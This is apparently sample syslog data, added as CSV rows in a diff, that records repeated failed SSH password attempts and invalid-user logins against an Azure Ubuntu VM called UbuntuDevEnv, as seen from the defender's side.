+9728,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:45:32,UbuntuDevEnv,2019-06-25 22:45:31,auth,UbuntuDevEnv,info,Failed password for invalid user training from 139.199.113.140 port 41448 ssh2,49304,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,training,139.199.113.1,41448,,
+9729,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:45:32,UbuntuDevEnv,2019-06-25 22:45:32,auth,UbuntuDevEnv,info,Received disconnect from 139.199.113.140 port 41448:11: Bye Bye [preauth],49304,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.199.113.1,41448,,
+9730,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:45:32,UbuntuDevEnv,2019-06-25 22:45:32,auth,UbuntuDevEnv,info,Disconnected from invalid user training 139.199.113.140 port 41448 [preauth],49304,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,training,139.199.113.1,41448,,
+9731,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:45:33,UbuntuDevEnv,2019-06-25 22:45:33,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 50491 ssh2,49315,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,50491,,
+9732,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:45:36,UbuntuDevEnv,2019-06-25 22:45:36,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 50491 ssh2,49315,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,50491,,
+9733,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:45:39,UbuntuDevEnv,2019-06-25 22:45:39,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 50491 ssh2,49315,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,50491,,
+9734,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:45:48,UbuntuDevEnv,2019-06-25 22:45:47,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.175 port 50491 ssh2 [preauth],49315,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,50491,,
+9735,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:45:48,UbuntuDevEnv,2019-06-25 22:45:47,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.175 port 50491: Too many authentication failures [preauth],49315,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,50491,,
+9736,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:45:48,UbuntuDevEnv,2019-06-25 22:45:47,auth,UbuntuDevEnv,info,message repeated 3 times: [ Failed password for root from 218.92.0.175 port 50491 ssh2],49315,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,50491,,
+9737,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:45:48,UbuntuDevEnv,2019-06-25 22:45:47,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,49315,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+9738,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:45:48,UbuntuDevEnv,2019-06-25 22:45:47,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,49315,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9739,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:45:51,UbuntuDevEnv,2019-06-25 22:45:51,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,49385,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9740,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:45:53,UbuntuDevEnv,2019-06-25 22:45:53,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 62590 ssh2,49385,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,62590,,
+9741,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:46:01,UbuntuDevEnv,2019-06-25 22:45:58,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 218.92.0.175 port 62590 ssh2],49385,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,62590,,
+9742,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:46:02,UbuntuDevEnv,2019-06-25 22:46:01,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 62590 ssh2,49385,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,62590,,
+9743,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:46:02,UbuntuDevEnv,2019-06-25 22:46:01,auth,UbuntuDevEnv,info,Invalid user asteriskuser from 77.232.128.87 port 60346,49426,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,asteriskuser,77.232.128.8,60346,,
+9744,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:46:02,UbuntuDevEnv,2019-06-25 22:46:01,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,49426,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9745,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:46:02,UbuntuDevEnv,2019-06-25 22:46:01,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=77.232.128.87,49426,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,77.232.128.8,,0,
+9746,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:46:04,UbuntuDevEnv,2019-06-25 22:46:03,auth,UbuntuDevEnv,info,Failed password for invalid user asteriskuser from 77.232.128.87 port 60346 ssh2,49426,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,asteriskuser,77.232.128.8,60346,,
+9747,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:46:04,UbuntuDevEnv,2019-06-25 22:46:03,auth,UbuntuDevEnv,info,Disconnected from invalid user asteriskuser 77.232.128.87 port 60346 [preauth],49426,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,asteriskuser,77.232.128.8,60346,,
+9748,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:46:04,UbuntuDevEnv,2019-06-25 22:46:03,auth,UbuntuDevEnv,info,Received disconnect from 77.232.128.87 port 60346:11: Bye Bye [preauth],49426,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,77.232.128.8,60346,,
+9749,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:46:04,UbuntuDevEnv,2019-06-25 22:46:04,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 62590 ssh2,49385,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,62590,,
+9750,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:46:07,UbuntuDevEnv,2019-06-25 22:46:07,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.175 port 62590 ssh2 [preauth],49385,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,62590,,
+9751,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:46:07,UbuntuDevEnv,2019-06-25 22:46:07,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,49385,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+9752,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:46:07,UbuntuDevEnv,2019-06-25 22:46:07,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.175 port 62590: Too many authentication failures [preauth],49385,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,62590,,
+9753,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:46:07,UbuntuDevEnv,2019-06-25 22:46:07,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,49385,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9754,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:46:07,UbuntuDevEnv,2019-06-25 22:46:07,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 62590 ssh2,49385,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,62590,,
+9755,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:46:12,UbuntuDevEnv,2019-06-25 22:46:12,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,49459,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9756,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:46:14,UbuntuDevEnv,2019-06-25 22:46:13,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 10091 ssh2,49459,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,10091,,
+9757,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:46:20,UbuntuDevEnv,2019-06-25 22:46:20,auth,UbuntuDevEnv,info,Invalid user james from 152.250.252.179 port 39146,49495,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,james,152.250.252.1,39146,,
+9758,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:46:20,UbuntuDevEnv,2019-06-25 22:46:19,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 218.92.0.175 port 10091 ssh2],49459,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,10091,,
+9759,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:46:20,UbuntuDevEnv,2019-06-25 22:46:20,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,49495,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9760,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:46:20,UbuntuDevEnv,2019-06-25 22:46:20,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=152.250.252.179,49495,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,152.250.252.1,,0,
+9761,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:46:22,UbuntuDevEnv,2019-06-25 22:46:22,auth,UbuntuDevEnv,info,Failed password for invalid user james from 152.250.252.179 port 39146 ssh2,49495,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,james,152.250.252.1,39146,,
+9762,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:46:22,UbuntuDevEnv,2019-06-25 22:46:22,auth,UbuntuDevEnv,info,Disconnected from invalid user james 152.250.252.179 port 39146 [preauth],49495,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,james,152.250.252.1,39146,,
+9763,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:46:22,UbuntuDevEnv,2019-06-25 22:46:22,auth,UbuntuDevEnv,info,Received disconnect from 152.250.252.179 port 39146:11: Bye Bye [preauth],49495,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,152.250.252.1,39146,,
+9764,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:46:23,UbuntuDevEnv,2019-06-25 22:46:22,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 10091 ssh2,49459,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,10091,,
+9765,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:46:28,UbuntuDevEnv,2019-06-25 22:46:28,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,49459,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+9766,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:46:28,UbuntuDevEnv,2019-06-25 22:46:28,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,49459,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9767,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:46:28,UbuntuDevEnv,2019-06-25 22:46:28,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.175 port 10091 ssh2 [preauth],49459,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,10091,,
+9768,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:46:28,UbuntuDevEnv,2019-06-25 22:46:28,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 218.92.0.175 port 10091 ssh2],49459,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,10091,,
+9769,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:46:28,UbuntuDevEnv,2019-06-25 22:46:28,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.175 port 10091: Too many authentication failures [preauth],49459,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,10091,,
+9770,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:46:33,UbuntuDevEnv,2019-06-25 22:46:33,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,49534,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9771,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:46:35,UbuntuDevEnv,2019-06-25 22:46:34,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 22497 ssh2,49534,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,22497,,
+9772,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:46:38,UbuntuDevEnv,2019-06-25 22:46:38,auth,UbuntuDevEnv,info,Invalid user support from 178.62.54.79 port 47562,49568,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,support,178.62.54.7,47562,,
+9773,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:46:38,UbuntuDevEnv,2019-06-25 22:46:37,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 22497 ssh2,49534,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,22497,,
+9774,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:46:38,UbuntuDevEnv,2019-06-25 22:46:38,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=178.62.54.79,49568,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,178.62.54.7,,0,
+9775,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:46:38,UbuntuDevEnv,2019-06-25 22:46:38,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,49568,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9776,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:46:40,UbuntuDevEnv,2019-06-25 22:46:39,auth,UbuntuDevEnv,info,Failed password for invalid user support from 178.62.54.79 port 47562 ssh2,49568,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,support,178.62.54.7,47562,,
+9777,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:46:40,UbuntuDevEnv,2019-06-25 22:46:39,auth,UbuntuDevEnv,info,Received disconnect from 178.62.54.79 port 47562:11: Bye Bye [preauth],49568,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,178.62.54.7,47562,,
+9778,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:46:40,UbuntuDevEnv,2019-06-25 22:46:39,auth,UbuntuDevEnv,info,Disconnected from invalid user support 178.62.54.79 port 47562 [preauth],49568,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,support,178.62.54.7,178,,
+9779,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:46:40,UbuntuDevEnv,2019-06-25 22:46:39,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 22497 ssh2,49534,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,22497,,
+9780,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:46:48,UbuntuDevEnv,2019-06-25 22:46:48,auth,UbuntuDevEnv,info,message repeated 3 times: [ Failed password for root from 218.92.0.175 port 22497 ssh2],49534,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,22497,,
+9781,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:46:48,UbuntuDevEnv,2019-06-25 22:46:48,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.175 port 22497 ssh2 [preauth],49534,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,22497,,
+9782,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:46:48,UbuntuDevEnv,2019-06-25 22:46:48,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,49534,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9783,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:46:48,UbuntuDevEnv,2019-06-25 22:46:48,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.175 port 22497: Too many authentication failures [preauth],49534,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,22497,,
+9784,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:46:48,UbuntuDevEnv,2019-06-25 22:46:48,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,49534,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+9785,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:46:54,UbuntuDevEnv,2019-06-25 22:46:53,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,49616,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9786,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:46:56,UbuntuDevEnv,2019-06-25 22:46:56,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 34979 ssh2,49616,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,34979,,
+9787,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:46:58,UbuntuDevEnv,2019-06-25 22:46:57,auth,UbuntuDevEnv,info,Invalid user roy from 139.199.113.140 port 55856,49632,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,roy,139.199.113.1,55856,,
